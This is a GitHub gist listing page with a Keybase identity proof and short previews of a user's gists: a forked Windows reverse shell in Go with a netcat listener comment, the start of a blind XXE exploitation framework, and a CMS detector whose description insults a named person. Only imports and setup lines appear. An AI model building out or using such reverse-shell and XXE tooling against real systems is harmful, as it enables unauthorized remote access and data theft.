Skip to content

Instantly share code, notes, and snippets.

Keybase proof

I hereby claim:

  • I am ptonewreckin on github.
  • I am ptonewreckin (https://keybase.io/ptonewreckin) on keybase.
  • I have a public key ASB5wOgVS7HRWwBUNboGh458v_3f2HVX6W0jq0clbYKaiAo

To claim this, I am signing this object:

@ptonewreckin
ptonewreckin / reversecmd.go
Created September 17, 2019 19:12 — forked from yougg/reversecmd.go
Golang reverse shell
// +build windows
// Reverse Windows CMD
// Test with nc -lvvp 6666
package main
import (
"bufio"
"net"
"os/exec"
@ptonewreckin
ptonewreckin / BlindRef_Attacker.py
Last active March 14, 2017 05:04
A basis for a Blind-Based XXE Exploitation Framework
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests, re, sys, getopt, json, urllib2, copy
serverURL = ""
serverPort = ""
webRequest = ""
def getInfo():
# Determine number of payloads on our server
@ptonewreckin
ptonewreckin / cmsdetector.py
Created September 6, 2016 02:38
andrewisadouchebag
from urllib2 import Request, build_opener, HTTPCookieProcessor, HTTPHandler
import cookielib
import requests
import re
import sys, os
import glob
import httplib
from collections import OrderedDict
import md5
import os.path